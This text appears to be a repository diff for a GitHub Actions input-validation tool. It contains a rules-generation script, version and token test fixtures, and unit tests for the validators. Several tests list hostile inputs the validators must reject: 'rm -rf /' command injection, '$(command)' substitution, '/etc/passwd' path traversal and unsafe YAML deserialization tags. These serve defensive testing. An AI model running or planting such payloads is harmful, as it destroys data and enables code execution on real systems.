overrides = {}
# Process each input
for input_name, input_data in action_data["inputs"].items():
is_required = input_data.get("required") in [True, "true"]
if is_required:
required_inputs.append(input_name)
else:
optional_inputs.append(input_name)
# Detect validation type
validation_type = self.detect_validation_type(input_name, input_data)
if validation_type:
conventions[input_name] = validation_type
# Handle action-specific overrides using data-driven approach
action_overrides = {
"php-version-detect": {"default-version": "php_version"},
"python-version-detect": {"default-version": "python_version"},
"python-version-detect-v2": {"default-version": "python_version"},
"dotnet-version-detect": {"default-version": "dotnet_version"},
"go-version-detect": {"default-version": "go_version"},
"npm-publish": {"package-version": "strict_semantic_version"},
"docker-build": {
"cache-mode": "cache_mode",
"sbom-format": "sbom_format",
},
"common-cache": {
"paths": "file_path",
"key-files": "file_path",
},
"common-file-check": {
"file-pattern": "file_path",
},
"common-retry": {
"backoff-strategy": "backoff_strategy",
"shell": "shell_type",
},
"node-setup": {
"package-manager": "package_manager_enum",
},
"docker-publish": {
"registry": "registry_enum",
"cache-mode": "cache_mode",
"platforms": None, # Skip validation - complex platform format
},
"docker-publish-hub": {
"password": "docker_password",
},
"go-lint": {
"go-version": "go_version",
"timeout": "timeout_with_unit",
"only-new-issues": "boolean",
"enable-linters": "linter_list",
"disable-linters": "linter_list",
},
"prettier-check": {
"check-only": "boolean",
"file-pattern": "file_pattern",
"plugins": "plugin_list",
},
"php-laravel-phpunit": {
"extensions": "php_extensions",
},
"codeql-analysis": {
"language": "codeql_language",
"queries": "codeql_queries",
"packs": "codeql_packs",
"config": "codeql_config",
"build-mode": "codeql_build_mode",
"source-root": "file_path",
"category": "category_format",
"token": "github_token",
"ram": "numeric_range_256_32768",
"threads": "numeric_range_1_128",
"output": "file_path",
"skip-queries": "boolean",
"add-snippets": "boolean",
},
}
if action_name in action_overrides:
# Apply overrides for existing conventions
overrides.update(
{
input_name: override_value
for input_name, override_value in action_overrides[action_name].items()
if input_name in conventions
},
)
# Add missing inputs from overrides to conventions
for input_name, override_value in action_overrides[action_name].items():
if input_name not in conventions and input_name in action_data["inputs"]:
conventions[input_name] = override_value
# Calculate statistics
total_inputs = len(action_data["inputs"])
validated_inputs = len(conventions)
skipped_inputs = sum(1 for v in overrides.values() if v is None)
coverage = round((validated_inputs / total_inputs) * 100) if total_inputs > 0 else 0
# Generate rules object with enhanced metadata
rules = {
"schema_version": "1.0",
"action": action_name,
"description": action_data["description"],
"generator_version": "1.0.0",
"required_inputs": sorted(required_inputs),
"optional_inputs": sorted(optional_inputs),
"conventions": self.sort_object_by_keys(conventions),
"overrides": self.sort_object_by_keys(overrides),
"statistics": {
"total_inputs": total_inputs,
"validated_inputs": validated_inputs,
"skipped_inputs": skipped_inputs,
"coverage_percentage": coverage,
},
"validation_coverage": coverage,
"auto_detected": True,
"manual_review_required": coverage < 80 or validated_inputs == 0,
"quality_indicators": {
"has_required_inputs": len(required_inputs) > 0,
"has_token_validation": "token" in conventions or "github-token" in conventions,
"has_version_validation": any("version" in v for v in conventions.values() if v),
"has_file_validation": any(v == "file_path" for v in conventions.values()),
"has_security_validation": any(
v in ["github_token", "security_patterns"] for v in conventions.values()
),
},
}
return rules
def write_rules_file(self, action_name: str, rules: dict[str, Any]) -> None:
"""Write rules to YAML file in action folder"""
rules_file = self.actions_dir / action_name / "rules.yml"
generator_version = rules.get("generator_version", "unknown")
schema_version = rules.get("schema_version", "unknown")
validation_coverage = rules.get("validation_coverage", 0)
validated_inputs = rules["statistics"].get("validated_inputs", 0)
total_inputs = rules["statistics"].get("total_inputs", 0)
header = f"""---
# Validation rules for {action_name} action
# Generated by update-validators.py v{generator_version} - DO NOT EDIT MANUALLY
# Schema version: {schema_version}
# Coverage: {validation_coverage}% ({validated_inputs}/{total_inputs} inputs)
#
# This file defines validation rules for the {action_name} GitHub Action.
# Rules are automatically applied by validate-inputs action when this
# action is used.
#
"""
# Use a custom yaml dumper to ensure proper indentation
class CustomYamlDumper(yaml.SafeDumper):
def increase_indent(self, flow: bool = False, *, indentless: bool = False) -> None: # noqa: FBT001, FBT002
return super().increase_indent(flow, indentless=indentless)
yaml_content = yaml.dump(
rules,
Dumper=CustomYamlDumper,
indent=2,
width=120,
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
)
content = header + yaml_content
if self.dry_run:
print(f"[DRY RUN] Would write {rules_file}:")
print(content)
print("---")
else:
with rules_file.open("w", encoding="utf-8") as f:
f.write(content)
print(f"✅ Generated {rules_file}")
def generate_rules(self) -> None:
"""Generate rules for all actions or a specific action"""
print("🔍 Scanning for GitHub Actions...")
actions = self.get_action_directories()
filtered_actions = actions
if self.specific_action:
filtered_actions = [name for name in actions if name == self.specific_action]
if not filtered_actions:
print(f"❌ Action '{self.specific_action}' not found")
sys.exit(1)
print(f"📝 Found {len(actions)} actions, processing {len(filtered_actions)}:")
for name in filtered_actions:
print(f" - {name}")
print()
processed = 0
failed = 0
for action_name in filtered_actions:
try:
rules = self.generate_rules_for_action(action_name)
if rules:
self.write_rules_file(action_name, rules)
processed += 1
else:
print(f"⚠️ Failed to generate rules for {action_name}")
failed += 1
except Exception as error:
print(f"❌ Error processing {action_name}: {error}")
failed += 1
print()
print("📊 Summary:")
print(f" - Processed: {processed}")
print(f" - Failed: {failed}")
coverage = (
round((processed / (processed + failed)) * 100) if (processed + failed) > 0 else 0
)
print(f" - Coverage: {coverage}%")
if not self.dry_run and processed > 0:
print()
print(
"✨ Validation rules updated! Run 'git diff */rules.yml' to review changes.",
)
def validate_rules_files(self) -> bool:
"""Validate existing rules files"""
print("🔍 Validating existing rules files...")
# Find all rules.yml files in action directories
rules_files = []
for action_dir in self.actions_dir.iterdir():
if action_dir.is_dir() and not action_dir.name.startswith("."):
rules_file = action_dir / "rules.yml"
if rules_file.exists():
rules_files.append(rules_file)
valid = 0
invalid = 0
for rules_file in rules_files:
try:
with rules_file.open(encoding="utf-8") as f:
content = f.read()
rules = yaml.safe_load(content)
# Basic validation
required = ["action", "required_inputs", "optional_inputs", "conventions"]
missing = [field for field in required if field not in rules]
if missing:
print(f"⚠️ {rules_file.name}: Missing fields: {', '.join(missing)}")
invalid += 1
else:
valid += 1
except Exception as error:
print(f"{rules_file.name}: {error}")
invalid += 1
print(f"✅ Validation complete: {valid} valid, {invalid} invalid")
return invalid == 0
def main() -> None:
"""CLI handling"""
parser = argparse.ArgumentParser(
description="Automatically generates validation rules for GitHub Actions",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python update-validators.py --dry-run
python update-validators.py --action csharp-publish
python update-validators.py --validate
""",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="Show what would be generated without writing files",
)
parser.add_argument("--action", metavar="NAME", help="Generate rules for specific action only")
parser.add_argument("--validate", action="store_true", help="Validate existing rules files")
args = parser.parse_args()
generator = ValidationRuleGenerator(dry_run=args.dry_run, specific_action=args.action)
if args.validate:
success = generator.validate_rules_files()
sys.exit(0 if success else 1)
else:
generator.generate_rules()
if __name__ == "__main__":
main()

1
validate-inputs/tests/__init__.py Normal file
View File

@@ -0,0 +1 @@
# Test package for validate-inputs action

1
validate-inputs/tests/fixtures/__init__.py vendored Normal file
View File

@@ -0,0 +1 @@
"""Test fixtures for validation tests."""

203
validate-inputs/tests/fixtures/version_test_data.py vendored Normal file
View File

@@ -0,0 +1,203 @@
"""Test data for version validation tests."""
# CalVer test cases
CALVER_VALID = [
("2024.3.1", "YYYY.MM.PATCH format"),
("2024.03.15", "YYYY.MM.DD format"),
("2024.03.05", "YYYY.0M.0D format"),
("24.3.1", "YY.MM.MICRO format"),
("2024.3", "YYYY.MM format"),
("2024-03-15", "YYYY-MM-DD format"),
("v2024.3.1", "CalVer with v prefix"),
("2023.12.31", "Year-end date"),
("2024.1.1", "Year start date"),
]
CALVER_INVALID = [
("2024.13.1", "Invalid month (13)"),
("2024.0.1", "Invalid month (0)"),
("2024.3.32", "Invalid day (32)"),
("2024.2.30", "Invalid day for February"),
("24.13.1", "Invalid month in YY format"),
("2024-13-15", "Invalid month in YYYY-MM-DD"),
("2024.3.1.1", "Too many components"),
("24.3", "YY.MM without patch"),
]
# SemVer test cases
SEMVER_VALID = [
("1.0.0", "Basic SemVer"),
("1.2.3", "Standard SemVer"),
("10.20.30", "Multi-digit versions"),
("1.1.2-prerelease", "Prerelease version"),
("1.1.2+meta", "Build metadata"),
("1.1.2-prerelease+meta", "Prerelease with metadata"),
("1.0.0-alpha", "Alpha version"),
("1.0.0-beta", "Beta version"),
("1.0.0-alpha.beta", "Complex prerelease"),
("1.0.0-alpha.1", "Numeric prerelease"),
("1.0.0-alpha0.beta", "Mixed prerelease"),
("1.0.0-alpha.1", "Alpha with number"),
("1.0.0-alpha.1.2", "Complex alpha"),
("1.0.0-rc.1", "Release candidate"),
("2.0.0-rc.1+build.1", "RC with build"),
("2.0.0+build.1", "Build metadata only"),
("1.2.3-beta", "Beta prerelease"),
("10.2.3-DEV-SNAPSHOT", "Dev snapshot"),
("1.2.3-SNAPSHOT-123", "Snapshot build"),
("v1.2.3", "SemVer with v prefix"),
("v1.0.0-alpha", "v prefix with prerelease"),
("1.0", "Major.minor only"),
("1", "Major only"),
]
SEMVER_INVALID = [
("1.2.a", "Non-numeric patch"),
("a.b.c", "Non-numeric versions"),
("1.2.3-", "Empty prerelease"),
("1.2.3+", "Empty build metadata"),
("1.2.3-+", "Empty prerelease and metadata"),
("+invalid", "Invalid start"),
("-invalid", "Invalid start"),
("-invalid+invalid", "Invalid format"),
("1.2.3.DEV.SNAPSHOT", "Too many dots"),
]
# Flexible version test cases (should accept both CalVer and SemVer)
FLEXIBLE_VALID = CALVER_VALID + SEMVER_VALID + [("latest", "Latest tag")]
FLEXIBLE_INVALID = [
("not-a-version", "Random string"),
("", "Empty string"),
("1.2.3.4.5", "Too many components"),
("1.2.-3", "Negative number"),
("1.2.3-", "Trailing dash"),
("1.2.3+", "Trailing plus"),
("1..2", "Double dot"),
("v", "Just v prefix"),
("version", "Word version"),
]
# Docker version test cases
DOCKER_VALID = [
("latest", "Latest tag"),
("v1.0.0", "Version tag"),
("1.0.0", "SemVer tag"),
("2024.3.1", "CalVer tag"),
("main", "Branch name"),
("feature-branch", "Feature branch"),
("sha-1234567", "SHA tag"),
]
DOCKER_INVALID = [
("", "Empty tag"),
("invalid..tag", "Double dots"),
("invalid tag", "Spaces not allowed"),
("INVALID", "All caps not preferred"),
]
# GitHub token test cases
GITHUB_TOKEN_VALID = [
("github_pat_" + "a" * 71, "Fine-grained PAT"), # 11 + 71 = 82 chars total (in 50-255 range)
("github_pat_" + "a" * 50, "Fine-grained PAT min length"), # 11 + 50 = 61 chars total (minimum)
("ghp_" + "a" * 36, "Classic PAT"), # 4 + 36 = 40 chars total
("gho_" + "a" * 36, "OAuth token"), # 4 + 36 = 40 chars total
("ghu_" + "a" * 36, "User token"),
("ghs_" + "a" * 36, "Installation token"),
("ghr_" + "a" * 36, "Refresh token"),
("${{ github.token }}", "GitHub Actions expression"),
("${{ secrets.GITHUB_TOKEN }}", "Secrets expression"),
]
GITHUB_TOKEN_INVALID = [
("", "Empty token"),
("invalid-token", "Invalid format"),
("ghp_short", "Too short"),
("wrong_prefix_" + "a" * 36, "Wrong prefix"),
("github_pat_" + "a" * 49, "PAT too short (min 50)"),
]
# Email test cases
EMAIL_VALID = [
("user@example.com", "Basic email"),
("test.email@domain.co.uk", "Complex email"),
("user+tag@example.org", "Email with plus"),
("123@example.com", "Numeric local part"),
]
EMAIL_INVALID = [
("", "Empty email"),
("notanemail", "No @ symbol"),
("@example.com", "Missing local part"),
("user@", "Missing domain"),
("user@@example.com", "Double @ symbol"),
]
# Username test cases
USERNAME_VALID = [
("user", "Simple username"),
("user123", "Username with numbers"),
("user-name", "Username with dash"),
("user_name", "Username with underscore"),
("a" * 39, "Maximum length"),
]
USERNAME_INVALID = [
("", "Empty username"),
("user;name", "Command injection"),
("user&&name", "Command injection"),
("user|name", "Command injection"),
("user`name", "Command injection"),
("user$(name)", "Command injection"),
("a" * 40, "Too long"),
]
# File path test cases
FILE_PATH_VALID = [
("file.txt", "Simple file"),
("path/to/file.txt", "Relative path"),
("folder/subfolder/file.ext", "Deep path"),
("", "Empty path (optional)"),
]
FILE_PATH_INVALID = [
("../file.txt", "Path traversal"),
("/absolute/path", "Absolute path"),
("path/../file.txt", "Path traversal in middle"),
("path/../../file.txt", "Multiple path traversal"),
]
# Numeric range test cases
NUMERIC_RANGE_VALID = [
("0", "Minimum value"),
("50", "Middle value"),
("100", "Maximum value"),
("42", "Answer to everything"),
]
NUMERIC_RANGE_INVALID = [
("", "Empty value"),
("-1", "Below minimum"),
("101", "Above maximum"),
("abc", "Non-numeric"),
("1.5", "Decimal not allowed"),
]
# Boolean test cases
BOOLEAN_VALID = [
("true", "Boolean true"),
("false", "Boolean false"),
("True", "Capitalized true"),
("False", "Capitalized false"),
("TRUE", "Uppercase true"),
("FALSE", "Uppercase false"),
]
BOOLEAN_INVALID = [
("", "Empty boolean"),
("yes", "Yes not allowed"),
("no", "No not allowed"),
("1", "Numeric not allowed"),
("0", "Numeric not allowed"),
("maybe", "Invalid value"),
]

211
validate-inputs/tests/test_base.py Normal file
View File

@@ -0,0 +1,211 @@
"""Tests for the base validator class."""
from __future__ import annotations
from pathlib import Path
import sys
import unittest
from unittest.mock import patch
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.base import BaseValidator
class ConcreteValidator(BaseValidator):
"""Concrete implementation for testing."""
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Simple validation implementation."""
return self.validate_required_inputs(inputs)
def get_required_inputs(self) -> list[str]:
"""Return test required inputs."""
return ["required1", "required2"]
def get_validation_rules(self) -> dict:
"""Return test validation rules."""
return {"test": "rules"}
class TestBaseValidator(unittest.TestCase): # pylint: disable=too-many-public-methods
"""Test the BaseValidator abstract class."""
def setUp(self): # pylint: disable=attribute-defined-outside-init
"""Set up test fixtures."""
self.validator = ConcreteValidator("test_action")
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "test_action"
assert self.validator.errors == []
assert self.validator._rules == {}
def test_error_management(self):
"""Test error handling methods."""
# Initially no errors
assert not self.validator.has_errors()
# Add an error
self.validator.add_error("Test error")
assert self.validator.has_errors()
assert len(self.validator.errors) == 1
assert self.validator.errors[0] == "Test error"
# Add another error
self.validator.add_error("Another error")
assert len(self.validator.errors) == 2
# Clear errors
self.validator.clear_errors()
assert not self.validator.has_errors()
assert self.validator.errors == []
def test_validate_required_inputs(self):
"""Test required input validation."""
# Missing required inputs
inputs = {}
assert not self.validator.validate_required_inputs(inputs)
assert len(self.validator.errors) == 2
# Clear for next test
self.validator.clear_errors()
# One required input missing
inputs = {"required1": "value1"}
assert not self.validator.validate_required_inputs(inputs)
assert len(self.validator.errors) == 1
assert "required2" in self.validator.errors[0]
# Clear for next test
self.validator.clear_errors()
# All required inputs present
inputs = {"required1": "value1", "required2": "value2"}
assert self.validator.validate_required_inputs(inputs)
assert not self.validator.has_errors()
# Empty required input
inputs = {"required1": "value1", "required2": " "}
assert not self.validator.validate_required_inputs(inputs)
assert "required2" in self.validator.errors[0]
def test_validate_security_patterns(self):
"""Test security pattern validation."""
# Safe value
assert self.validator.validate_security_patterns("safe_value")
assert not self.validator.has_errors()
# Command injection patterns
dangerous_values = [
"value; rm -rf /",
"value && malicious",
"value || exit",
"value | grep",
"value `command`",
"$(command)",
"${variable}",
"../../../etc/passwd",
"..\\..\\windows",
]
for dangerous in dangerous_values:
self.validator.clear_errors()
assert not self.validator.validate_security_patterns(dangerous, "test_input"), (
f"Failed to detect dangerous pattern: {dangerous}"
)
assert self.validator.has_errors()
def test_validate_path_security(self):
"""Test path security validation."""
# Valid paths
valid_paths = [
"relative/path/file.txt",
"file.txt",
"./local/file",
"subdir/another/file.yml",
]
for path in valid_paths:
self.validator.clear_errors()
assert self.validator.validate_path_security(path), (
f"Incorrectly rejected valid path: {path}"
)
assert not self.validator.has_errors()
# Invalid paths
invalid_paths = [
"/absolute/path",
"C:\\Windows\\System32",
"../parent/directory",
"path/../../../etc",
"..\\..\\windows",
]
for path in invalid_paths:
self.validator.clear_errors()
assert not self.validator.validate_path_security(path), (
f"Failed to reject invalid path: {path}"
)
assert self.validator.has_errors()
def test_validate_empty_allowed(self):
"""Test empty value validation."""
# Non-empty value
assert self.validator.validate_empty_allowed("value", "test")
assert not self.validator.has_errors()
# Empty string
assert not self.validator.validate_empty_allowed("", "test")
assert self.validator.has_errors()
assert "cannot be empty" in self.validator.errors[0]
# Whitespace only
self.validator.clear_errors()
assert not self.validator.validate_empty_allowed(" ", "test")
assert self.validator.has_errors()
@patch("pathlib.Path.exists")
@patch("pathlib.Path.open")
@patch("yaml.safe_load")
def test_load_rules(self, mock_yaml_load, mock_path_open, mock_exists):
"""Test loading validation rules from YAML."""
# The mock_path_open is handled by the patch decorator
del mock_path_open # Unused but required by decorator
# Mock YAML content
mock_rules = {
"required_inputs": ["input1"],
"conventions": {"token": "github_token"},
}
mock_yaml_load.return_value = mock_rules
mock_exists.return_value = True
# Create a Path object
from pathlib import Path
rules_path = Path("/fake/path/rules.yml")
# Load the rules
rules = self.validator.load_rules(rules_path)
assert rules == mock_rules
assert self.validator._rules == mock_rules
def test_github_actions_output(self):
"""Test GitHub Actions output formatting."""
# Success case
output = self.validator.get_github_actions_output()
assert output["status"] == "success"
assert output["error"] == ""
# Failure case
self.validator.add_error("Error 1")
self.validator.add_error("Error 2")
output = self.validator.get_github_actions_output()
assert output["status"] == "failure"
assert output["error"] == "Error 1; Error 2"
if __name__ == "__main__":
unittest.main()

58
validate-inputs/tests/test_boolean.py Normal file
View File

@@ -0,0 +1,58 @@
"""Tests for boolean validator.
Generated by generate-tests.py - Do not edit manually.
"""
from validators.boolean import BooleanValidator
class TestBooleanValidator:
"""Test cases for BooleanValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = BooleanValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_valid_boolean_values(self):
"""Test valid boolean values."""
valid_values = ["true", "false", "True", "False", "TRUE", "FALSE"]
for value in valid_values:
assert self.validator.validate_boolean(value) is True
assert not self.validator.has_errors()
def test_validate_boolean_extended(self):
"""Test valid extended boolean values."""
valid_values = [
"true",
"false",
"True",
"False",
"TRUE",
"FALSE",
"yes",
"no",
"on",
"off",
"1",
"0",
]
for value in valid_values:
assert self.validator.validate_boolean_extended(value) is True
assert not self.validator.has_errors()
def test_invalid_boolean_values(self):
"""Test invalid boolean values."""
invalid_values = ["maybe", "unknown", "2", "-1", "null"]
for value in invalid_values:
self.validator.clear_errors()
assert self.validator.validate_boolean(value) is False
assert self.validator.has_errors()
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_boolean("${{ inputs.dry_run }}") is True
assert self.validator.validate_boolean("${{ env.DEBUG }}") is True

159
validate-inputs/tests/test_boolean_validator.py Normal file
View File

@@ -0,0 +1,159 @@
"""Tests for the BooleanValidator module."""
from pathlib import Path
import sys
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.boolean import BooleanValidator
from tests.fixtures.version_test_data import BOOLEAN_INVALID, BOOLEAN_VALID
class TestBooleanValidator:
"""Test cases for BooleanValidator."""
def setup_method(self):
"""Set up test environment."""
self.validator = BooleanValidator()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.errors == []
rules = self.validator.get_validation_rules()
assert "boolean" in rules
@pytest.mark.parametrize("value,description", BOOLEAN_VALID)
def test_validate_boolean_valid(self, value, description):
"""Test boolean validation with valid values."""
self.validator.errors = []
result = self.validator.validate_boolean(value)
assert result is True, f"Failed for {description}: {value}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("value,description", BOOLEAN_INVALID)
def test_validate_boolean_invalid(self, value, description):
"""Test boolean validation with invalid values."""
self.validator.errors = []
result = self.validator.validate_boolean(value)
if value == "": # Empty value is allowed
assert result is True
else:
assert result is False, f"Should fail for {description}: {value}"
assert len(self.validator.errors) > 0
def test_case_insensitive_validation(self):
"""Test that boolean validation is case-insensitive."""
valid_cases = [
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
]
for value in valid_cases:
self.validator.errors = []
result = self.validator.validate_boolean(value)
assert result is True, f"Should accept: {value}"
def test_invalid_boolean_strings(self):
"""Test that non-boolean strings are rejected."""
invalid_values = [
"yes",
"no", # Yes/no not allowed
"1",
"0", # Numbers not allowed
"on",
"off", # On/off not allowed
"enabled",
"disabled", # Words not allowed
]
for value in invalid_values:
self.validator.errors = []
result = self.validator.validate_boolean(value)
assert result is False, f"Should reject: {value}"
assert len(self.validator.errors) > 0
def test_validate_inputs_with_boolean_keywords(self):
"""Test that inputs with boolean keywords are validated."""
inputs = {
"dry-run": "true",
"verbose": "false",
"debug": "TRUE",
"skip-tests": "False",
"enable-cache": "true",
"disable-warnings": "false",
}
result = self.validator.validate_inputs(inputs)
assert result is True
assert len(self.validator.errors) == 0
def test_validate_inputs_with_invalid_booleans(self):
"""Test that invalid boolean values are caught."""
inputs = {
"dry-run": "yes", # Invalid
"verbose": "1", # Invalid
}
result = self.validator.validate_inputs(inputs)
assert result is False
assert len(self.validator.errors) > 0
def test_boolean_patterns(self):
"""Test that boolean patterns are detected correctly."""
# Test inputs that should be treated as boolean
boolean_inputs = [
"dry-run",
"dry_run",
"is-enabled",
"is_enabled",
"has-feature",
"has_feature",
"enable-something",
"disable-something",
"use-cache",
"with-logging",
"without-logging",
"feature-enabled",
"feature_disabled",
]
for input_name in boolean_inputs:
inputs = {input_name: "invalid"}
self.validator.errors = []
result = self.validator.validate_inputs(inputs)
assert result is False, f"Should validate as boolean: {input_name}"
def test_non_boolean_inputs_ignored(self):
"""Test that non-boolean inputs are not validated."""
inputs = {
"version": "1.2.3", # Not a boolean input
"name": "test", # Not a boolean input
"count": "5", # Not a boolean input
}
result = self.validator.validate_inputs(inputs)
assert result is True # Should not validate non-boolean inputs
assert len(self.validator.errors) == 0
def test_empty_value_allowed(self):
"""Test that empty boolean values are allowed."""
result = self.validator.validate_boolean("")
assert result is True
assert len(self.validator.errors) == 0
def test_whitespace_only_value(self):
"""Test that whitespace-only values are treated as empty."""
values = [" ", " ", "\t", "\n"]
for value in values:
self.validator.errors = []
result = self.validator.validate_boolean(value)
assert result is True # Empty/whitespace should be allowed

83
validate-inputs/tests/test_codeql-analysis_custom.py Normal file
View File

@@ -0,0 +1,83 @@
"""Tests for codeql-analysis custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "codeql-analysis"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomCodeqlAnalysisValidator:
"""Test cases for codeql-analysis custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("codeql-analysis")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for codeql-analysis
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for codeql-analysis
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for codeql-analysis
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for codeql-analysis
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_codeql_specific_validation(self):
"""Test CodeQL-specific validation."""
inputs = {
"language": "javascript,python",
"queries": "security-extended",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

307
validate-inputs/tests/test_codeql.py Normal file
View File

@@ -0,0 +1,307 @@
"""Tests for codeql validator."""
from validators.codeql import CodeQLValidator
class TestCodeqlValidator:
"""Test cases for CodeqlValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CodeQLValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "test-action"
assert len(self.validator.SUPPORTED_LANGUAGES) > 0
assert len(self.validator.STANDARD_SUITES) > 0
assert len(self.validator.BUILD_MODES) > 0
def test_get_required_inputs(self):
"""Test getting required inputs."""
required = self.validator.get_required_inputs()
assert "language" in required
def test_get_validation_rules(self):
"""Test getting validation rules."""
rules = self.validator.get_validation_rules()
assert "language" in rules
assert "queries" in rules
assert "build_modes" in rules
def test_validate_inputs(self):
"""Test validate_inputs method."""
inputs = {"language": "python"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_error_handling(self):
"""Test error handling."""
self.validator.add_error("Test error")
assert self.validator.has_errors()
assert len(self.validator.errors) == 1
self.validator.clear_errors()
assert not self.validator.has_errors()
assert len(self.validator.errors) == 0
def test_github_expressions(self):
"""Test GitHub expression handling."""
result = self.validator.is_github_expression("${{ inputs.value }}")
assert result is True
# Language validation tests
def test_validate_codeql_language_valid(self):
"""Test validation of valid CodeQL languages."""
valid_languages = ["python", "javascript", "typescript", "java", "go", "cpp", "csharp"]
for lang in valid_languages:
assert self.validator.validate_codeql_language(lang) is True
self.validator.clear_errors()
def test_validate_codeql_language_case_insensitive(self):
"""Test language validation is case insensitive."""
assert self.validator.validate_codeql_language("Python") is True
assert self.validator.validate_codeql_language("JAVASCRIPT") is True
def test_validate_codeql_language_empty(self):
"""Test validation rejects empty language."""
assert self.validator.validate_codeql_language("") is False
assert self.validator.has_errors()
def test_validate_codeql_language_invalid(self):
"""Test validation rejects invalid language."""
assert self.validator.validate_codeql_language("invalid-lang") is False
assert self.validator.has_errors()
# Queries validation tests
def test_validate_codeql_queries_standard_suite(self):
"""Test validation of standard query suites."""
standard_suites = ["security-extended", "security-and-quality", "code-scanning", "default"]
for suite in standard_suites:
assert self.validator.validate_codeql_queries(suite) is True
self.validator.clear_errors()
def test_validate_codeql_queries_multiple(self):
"""Test validation of multiple query suites."""
assert self.validator.validate_codeql_queries("security-extended,code-scanning") is True
def test_validate_codeql_queries_file_path(self):
"""Test validation of query file paths."""
assert self.validator.validate_codeql_queries("queries/security.ql") is True
assert self.validator.validate_codeql_queries("queries/suite.qls") is True
def test_validate_codeql_queries_custom_path(self):
"""Test validation of custom query paths."""
assert self.validator.validate_codeql_queries("./custom/queries") is True
def test_validate_codeql_queries_github_expression(self):
"""Test queries accept GitHub expressions."""
assert self.validator.validate_codeql_queries("${{ inputs.queries }}") is True
def test_validate_codeql_queries_empty(self):
"""Test validation rejects empty queries."""
assert self.validator.validate_codeql_queries("") is False
assert self.validator.has_errors()
def test_validate_codeql_queries_invalid(self):
"""Test validation rejects invalid queries."""
assert self.validator.validate_codeql_queries("invalid-query") is False
assert self.validator.has_errors()
def test_validate_codeql_queries_path_traversal(self):
"""Test queries reject path traversal."""
result = self.validator.validate_codeql_queries("../../../etc/passwd")
assert result is False
assert self.validator.has_errors()
# Packs validation tests
def test_validate_codeql_packs_valid(self):
"""Test validation of valid pack formats."""
valid_packs = [
"my-pack",
"owner/repo",
"owner/repo@1.0.0",
"org/pack@latest",
]
for pack in valid_packs:
assert self.validator.validate_codeql_packs(pack) is True
self.validator.clear_errors()
def test_validate_codeql_packs_multiple(self):
"""Test validation of multiple packs."""
assert self.validator.validate_codeql_packs("pack1,owner/pack2,org/pack3@1.0") is True
def test_validate_codeql_packs_empty(self):
"""Test empty packs are allowed."""
assert self.validator.validate_codeql_packs("") is True
def test_validate_codeql_packs_invalid_format(self):
"""Test validation rejects invalid pack format."""
assert self.validator.validate_codeql_packs("invalid pack!") is False
assert self.validator.has_errors()
# Build mode validation tests
def test_validate_codeql_build_mode_valid(self):
"""Test validation of valid build modes."""
valid_modes = ["none", "manual", "autobuild"]
for mode in valid_modes:
assert self.validator.validate_codeql_build_mode(mode) is True
self.validator.clear_errors()
def test_validate_codeql_build_mode_case_insensitive(self):
"""Test build mode validation is case insensitive."""
assert self.validator.validate_codeql_build_mode("None") is True
assert self.validator.validate_codeql_build_mode("AUTOBUILD") is True
def test_validate_codeql_build_mode_empty(self):
"""Test empty build mode is allowed."""
assert self.validator.validate_codeql_build_mode("") is True
def test_validate_codeql_build_mode_invalid(self):
"""Test validation rejects invalid build mode."""
assert self.validator.validate_codeql_build_mode("invalid-mode") is False
assert self.validator.has_errors()
# Config validation tests
def test_validate_codeql_config_valid(self):
"""Test validation of valid config."""
valid_config = "name: my-config\nqueries: security-extended"
assert self.validator.validate_codeql_config(valid_config) is True
def test_validate_codeql_config_empty(self):
"""Test empty config is allowed."""
assert self.validator.validate_codeql_config("") is True
def test_validate_codeql_config_dangerous_python(self):
"""Test config rejects dangerous Python patterns."""
assert self.validator.validate_codeql_config("!!python/object/apply") is False
assert self.validator.has_errors()
def test_validate_codeql_config_dangerous_ruby(self):
"""Test config rejects dangerous Ruby patterns."""
assert self.validator.validate_codeql_config("!!ruby/object:Gem::Installer") is False
assert self.validator.has_errors()
